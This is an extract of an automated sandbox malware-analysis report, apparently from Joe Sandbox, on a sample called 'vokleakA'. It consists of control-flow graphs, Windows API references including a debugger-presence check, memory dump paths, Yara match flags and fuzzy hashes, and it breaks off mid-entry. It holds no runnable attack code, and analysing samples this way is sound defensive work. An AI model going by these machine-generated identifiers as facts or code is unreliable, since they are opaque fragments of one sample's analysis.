                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 272 31b193b8-31b19427 FindCloseChangeNotification 275 31b19430-31b19455 272->275 276 31b19429-31b1942f 272->276 276->275
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE ref: 31B1941A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3231199992.0000000031B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31b10000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: 9c4cd828ebad215c09112ca1cce53fdfd89554a6b0aec6a795484bfb6252d723
                                                                                                    • Instruction ID: b3115cda103188e9894b11dffa511ebfb3af50ce78718de3a408e8c00c39913e
                                                                                                    • Opcode Fuzzy Hash: 9c4cd828ebad215c09112ca1cce53fdfd89554a6b0aec6a795484bfb6252d723
                                                                                                    • Instruction Fuzzy Hash: FE1128B1D002488FDB20DFAAC5457AEFBF4EF88324F208429D519A7240CB79A940CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                    • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocString_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 959018026-0
                                                                                                    • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                    • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                    • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                    • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000001.2001615999.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000004.00000001.2001615999.000000000044A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_1_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 10892065-0
                                                                                                    • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                    • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                    • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                    • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 295 35bd3b30-35bd3b59 298 35bd3b5b-35bd3b62 295->298 299 35bd3b64-35bd3b6b 295->299 298->299 302 35bd3b70-35bd3b85 298->302 303 35bd3e13-35bd3e1a 299->303 306 35bd3df9-35bd3e00 302->306 307 35bd3b8b-35bd3bbc call 35bd3aa0 302->307 306->303 315 35bd3d8c-35bd3d93 307->315 316 35bd3bc2-35bd3bdf call 35bd3a80 307->316 320 35bd3d9b-35bd3da2 315->320 321 35bd3d95 315->321 332 35bd3bef-35bd3bff 316->332 333 35bd3be1 316->333 320->303 323 35bd3da4-35bd3df1 call 35bd3a80 call 35bd3aa0 321->323 324 35bd3d97-35bd3d99 321->324 356 35bd3df7 323->356 324->320 324->323 341 35bd3c0b-35bd3c0e 332->341 342 35bd3c01-35bd3c03 332->342 335 35bd3d49-35bd3d59 333->335 336 35bd3be7-35bd3be9 333->336 348 35bd3d5b-35bd3d5d 335->348 349 35bd3d65-35bd3d68 335->349 336->332 336->335 346 35bd3e02-35bd3e0e 341->346 347 35bd3c14-35bd3c27 341->347 345 35bd3c09 342->345 342->346 345->347 346->303 360 35bd3ca9-35bd3cb0 347->360 348->346 352 35bd3d63 348->352 349->346 350 35bd3d6e-35bd3d8a 349->350 350->323 352->350 356->303 363 35bd3cc0-35bd3cff call 35bd3a80 360->363 364 35bd3cb2 360->364 382 35bd3d06-35bd3d1f 363->382 365 35bd3c2c-35bd3c4c call 35bd3a80 call 35bd3aa0 364->365 366 35bd3cb8-35bd3cba 364->366 379 35bd3c52-35bd3c56 365->379 366->363 366->365 380 35bd3c58-35bd3c5f 379->380 381 35bd3c64-35bd3c95 call 35bd3aa0 379->381 380->303 398 35bd3c9d-35bd3ca4 381->398 399 35bd3c97 381->399 391 35bd3d2b-35bd3d2e 382->391 392 35bd3d21-35bd3d23 382->392 391->346 395 35bd3d34-35bd3d47 391->395 392->346 394 35bd3d29 392->394 394->395 395->323 398->303 399->360 400 35bd3c99-35bd3c9b 399->400 400->360 400->398
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: xaq
                                                                                                    • API String ID: 0-793007810
                                                                                                    • Opcode ID: e41d4501c7f6fcbd2f769cdbd724a758737b322feff5e85d4c6f4ca0c3ba4592
                                                                                                    • Instruction ID: c916162b7fae6af52fa613aba7ff295c9182ea42801b52f57c3d560aeb2b1542
                                                                                                    • Opcode Fuzzy Hash: e41d4501c7f6fcbd2f769cdbd724a758737b322feff5e85d4c6f4ca0c3ba4592
                                                                                                    • Instruction Fuzzy Hash: DB61E935B007174FEF1CAF794A11F1FA5E6AF88650F55843DD90ACB29AEE74D80242B2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 403 35bd37b8-35bd37e5 405 35bd37ec-35bd37fe 403->405 406 35bd37e7 403->406 409 35bd3818-35bd3853 405->409 410 35bd3800-35bd3813 405->410 406->405 420 35bd3859-35bd3890 409->420 421 35bd3907-35bd392b 409->421 411 35bd397f-35bd3985 410->411 413 35bd398f 411->413 414 35bd3987 411->414 415 35bd3990 413->415 414->413 415->415 430 35bd38c9-35bd38de 420->430 428 35bd3931-35bd3953 421->428 428->411 433 35bd38e0-35bd38f9 430->433 434 35bd3892-35bd38c3 430->434 437 35bd38fb 433->437 438 35bd3904 433->438 434->430 437->438 438->421
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te]q
                                                                                                    • API String ID: 0-52440209
                                                                                                    • Opcode ID: 0d76c55fc05638ff571aaa0125d701a9f5ee9b34a909a4f8ee5938a1de0ed86d
                                                                                                    • Instruction ID: d3033a26f5124b048aa1b7631ba498befd08895ba2c12753e9cbaf19ec685828
                                                                                                    • Opcode Fuzzy Hash: 0d76c55fc05638ff571aaa0125d701a9f5ee9b34a909a4f8ee5938a1de0ed86d
                                                                                                    • Instruction Fuzzy Hash: D2515C70A40205DFDB149F75C858B6ABBF2AF48720F218169E416AB3A5CFB5AC41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 444 35bd3138-35bd317e 449 35bd3186-35bd3189 444->449 450 35bd3180-35bd3182 444->450 452 35bd31e0 449->452 453 35bd318b-35bd31c2 call 35bd36b1 449->453 451 35bd3184 450->451 450->452 451->453 455 35bd31e5-35bd31e9 452->455 461 35bd31c8-35bd31de 453->461 456 35bd31eb 455->456 457 35bd31f4 455->457 456->457 461->455
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te]q
                                                                                                    • API String ID: 0-52440209
                                                                                                    • Opcode ID: d584beedd247f27c37316edb6b0235e71218323ebe92c2957216e160ef03f28b
                                                                                                    • Instruction ID: c632ffdd0dde03a66eb5f339f6114047beab4ea22a6a35c089a809cbfac46d68
                                                                                                    • Opcode Fuzzy Hash: d584beedd247f27c37316edb6b0235e71218323ebe92c2957216e160ef03f28b
                                                                                                    • Instruction Fuzzy Hash: 36216D34B101159FDB089F69C558B9EBBF6BF88710F214169E502EB3A1CFB19C01CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 463 35bd36b1-35bd3747 call 35bd1b60 474 35bd3749 463->474 475 35bd3752 463->475 474->475
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te]q
                                                                                                    • API String ID: 0-52440209
                                                                                                    • Opcode ID: bced5d5f9a7e1fe97527bb90f9fa097cdc176cf20dae8f1c7f77d8822539076d
                                                                                                    • Instruction ID: 8056c6f1e374bd0302eeb3c344b8f8d07518786380c704b20dd564316676d3b6
                                                                                                    • Opcode Fuzzy Hash: bced5d5f9a7e1fe97527bb90f9fa097cdc176cf20dae8f1c7f77d8822539076d
                                                                                                    • Instruction Fuzzy Hash: C1118C74B40204DFDB049F69C499FAEBBE6EF88710F144069E906AB3A1CEB19C41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 476 35bd41a7-35bd4208 call 35bd4770 482 35bd420e-35bd4227 476->482 484 35bd4229 482->484 485 35bd4232 482->485 484->485
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Te]q
                                                                                                    • API String ID: 0-52440209
                                                                                                    • Opcode ID: 49a488f032e5504598de9e7b9aedb85056d9e22860e87c9495431629e5d4c0be
                                                                                                    • Instruction ID: 17bf9827cce8cd6ff010b831cad6121d3398e44c0e1e3f527c73b753445c88cb
                                                                                                    • Opcode Fuzzy Hash: 49a488f032e5504598de9e7b9aedb85056d9e22860e87c9495431629e5d4c0be
                                                                                                    • Instruction Fuzzy Hash: 86016D75B505149FDB089F68C559BAEBBF6AF8C700F214069E506EB3A0CFB15D06CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LR]q
                                                                                                    • API String ID: 0-3081347316
                                                                                                    • Opcode ID: 5577f1486c2af98a287eed3f945372859ccea13a776f84aaefc87380ae7cb247
                                                                                                    • Instruction ID: 2da187de311e153d32c00de60e34c96bcfe545aafad496b6827c5553b1da8ca1
                                                                                                    • Opcode Fuzzy Hash: 5577f1486c2af98a287eed3f945372859ccea13a776f84aaefc87380ae7cb247
                                                                                                    • Instruction Fuzzy Hash: 55016275B402599FDB48EFA8C901B9EF7F5FF48600F104169E549EB250EB70AE0187C5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 487 35bd2c70-35bd2ca9 490 35bd2caf 487->490 491 35bd2cab-35bd2cad 487->491 492 35bd2cb2-35bd2cc1 call 35bd1a60 490->492 491->492 495 35bd2cc6-35bd2cd6 call 35bd1a6c 492->495 498 35bd2ce8-35bd2cf3 495->498 499 35bd2cd8-35bd2cf9 495->499
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LR]q
                                                                                                    • API String ID: 0-3081347316
                                                                                                    • Opcode ID: eda321d35dfa0b7dedd8ad67d56d8916969e87686d19a0176065c7a890b7e3b9
                                                                                                    • Instruction ID: 3f46a3a8d55c4aa2ee21f921fab370ac12ecb1ae8b1373cda0d1dae8a31094a3
                                                                                                    • Opcode Fuzzy Hash: eda321d35dfa0b7dedd8ad67d56d8916969e87686d19a0176065c7a890b7e3b9
                                                                                                    • Instruction Fuzzy Hash: 1001A270F00219AFE708EF78C901A5EB6F5FF48610F104169D956E7264EB705E0187D5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 023cbcb75fea7e207391386d885c118a052a16c2fd8717f9e9c46140a315bb97
                                                                                                    • Instruction ID: a73ae7e1516ac3dc4ba7aedf76fb02b1c3a3c56438432d104da48f730c6cc4af
                                                                                                    • Opcode Fuzzy Hash: 023cbcb75fea7e207391386d885c118a052a16c2fd8717f9e9c46140a315bb97
                                                                                                    • Instruction Fuzzy Hash: DB71FD34B003259BDB1DAFB4C45496E77E7BFC9245B21493DD80AAB384DF7998078B81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a109b2c8c7565b2610733018791d14d01210676fee298b537d77ded25ccdeb73
                                                                                                    • Instruction ID: 75df599cd94a278bc32abb8638f2c2c532ea5ef923d74707e0e471ff7a9ac481
                                                                                                    • Opcode Fuzzy Hash: a109b2c8c7565b2610733018791d14d01210676fee298b537d77ded25ccdeb73
                                                                                                    • Instruction Fuzzy Hash: C121E275500384DFEB06DF24DDC0B06BF69FB88359F24C669DD090B256C33AD456CAA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c921c2d328b0a75b0829bcadabe5bd4006e13236ea28cc7ebcb6563c10c9378f
                                                                                                    • Instruction ID: 5f520bf5b0468d8d6d5e3794c447fdf0c4505e2c2f56c784153941d5d11184ae
                                                                                                    • Opcode Fuzzy Hash: c921c2d328b0a75b0829bcadabe5bd4006e13236ea28cc7ebcb6563c10c9378f
                                                                                                    • Instruction Fuzzy Hash: 89213034A006158FCF05EF74C5546AEBBF6EF89619F104428C406BB765DF359C46CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                    • Instruction ID: dac591a9003be4174fab31c50431d5679b2515c2bd58d7532e58085490abf84f
                                                                                                    • Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                    • Instruction Fuzzy Hash: 5C11D376504280CFDB02CF10D9C4B06BF71FB88318F24C6A9DD490B256C33AD45ACBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: afbeb37c841b1c3768619c2a2fe404304997365d98edf1f85f7d4d6d37a0cf29
                                                                                                    • Instruction ID: 04e4535e2e3f7bcbeb50d770cbe433d60bc6684a6ce639feaf98f91e0e027e48
                                                                                                    • Opcode Fuzzy Hash: afbeb37c841b1c3768619c2a2fe404304997365d98edf1f85f7d4d6d37a0cf29
                                                                                                    • Instruction Fuzzy Hash: 8E01B13470032187DB08AB78895459E73EBAFC9658B00453EDD0AA7385EF349C0B87C2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 783eb075fa00596135bb4f30ae41dc16b7fee9c7c96ed6e068acece3c8161a7b
                                                                                                    • Instruction ID: e670598b84a9d72d23de08a585ba50099cb6aef24956e6e0d85322d804fbc413
                                                                                                    • Opcode Fuzzy Hash: 783eb075fa00596135bb4f30ae41dc16b7fee9c7c96ed6e068acece3c8161a7b
                                                                                                    • Instruction Fuzzy Hash: 0D012C30B002169B8F49EBB884119AEB7E6AF85210B514639C11DAB384EF399D0687D1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a213ace06515e485e8a1f209b9e762101f6a3e0bf373187f5dbe7acb1082407
                                                                                                    • Instruction ID: 1dcd32d9e8bc0390dbe7571d3d4b0c19186f4e2c0bb1ca41c26ecff1cfa62ff8
                                                                                                    • Opcode Fuzzy Hash: 2a213ace06515e485e8a1f209b9e762101f6a3e0bf373187f5dbe7acb1082407
                                                                                                    • Instruction Fuzzy Hash: 63012B710043849EFB118E15CD80B57FF9CEF453F9F18C429ED491B246C6799801CAB1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f8078739af6b0ea62e5c227eb9b6b28e3488c0dfb567ca97978df5591721dfc
                                                                                                    • Instruction ID: 239acd0081b9148da34bbab43f21a677d83743f8b9eb4fab1fa393d8dd64bffa
                                                                                                    • Opcode Fuzzy Hash: 6f8078739af6b0ea62e5c227eb9b6b28e3488c0dfb567ca97978df5591721dfc
                                                                                                    • Instruction Fuzzy Hash: A91100B48003898FCB20DF9AC545B9EFBF4EB09320F20845AD559B7250C379A940CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3230642536.0000000031ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 31ABD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_31abd000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b2108924b7cf4d22c00348f3bbe2f3a9fe5f01e05fb354e3ee8a94229a126e44
                                                                                                    • Instruction ID: 2410720becc29408d305490f08d2a464bc1e765e19dfa20392d31866a70ae725
                                                                                                    • Opcode Fuzzy Hash: b2108924b7cf4d22c00348f3bbe2f3a9fe5f01e05fb354e3ee8a94229a126e44
                                                                                                    • Instruction Fuzzy Hash: 2FF0C2B1004384AEE7118E16CD84B62FF9CEF42379F18C45AED481A286C2799840CAB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05b884dcd378c0d3fab888cfad4c41c6bcddb568230554e2c5167edda9644070
                                                                                                    • Instruction ID: 31b9e9ca3eda7e2ca75f286164b8fd174dd544e9bdd6618f21cb5d7aa1f27f52
                                                                                                    • Opcode Fuzzy Hash: 05b884dcd378c0d3fab888cfad4c41c6bcddb568230554e2c5167edda9644070
                                                                                                    • Instruction Fuzzy Hash: F6F0223170C3926FC302ABBCD41189A3FF4AF8722039500E7C045CF2BACA289C0983E2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3237355887.0000000035BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35BD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35bd0000_vokleakA.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f919c7ab122e83090b99ee6656c67e947466a1e1fa4f2637363a74ae20a88fba
                                                                                                    • Instruction ID: 16088b36a1b5f549a26d5efd6f6b4e7e8c4c70f6e536eb942d392985433b36a8
                                                                                                    • Opcode Fuzzy Hash: f919c7ab122e83090b99ee6656c67e947466a1e1fa4f2637363a74ae20a88fba
                                                                                                    • Instruction Fuzzy Hash: 7DD0A7327000155FC600A6FDE40485E37DD9FCA51079000A5D109DF364CE65EC0113C5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2579439406-0
                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Heap$FreeProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859560861-0
                                                                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.3207967153.000000000044A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_vokleakA.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
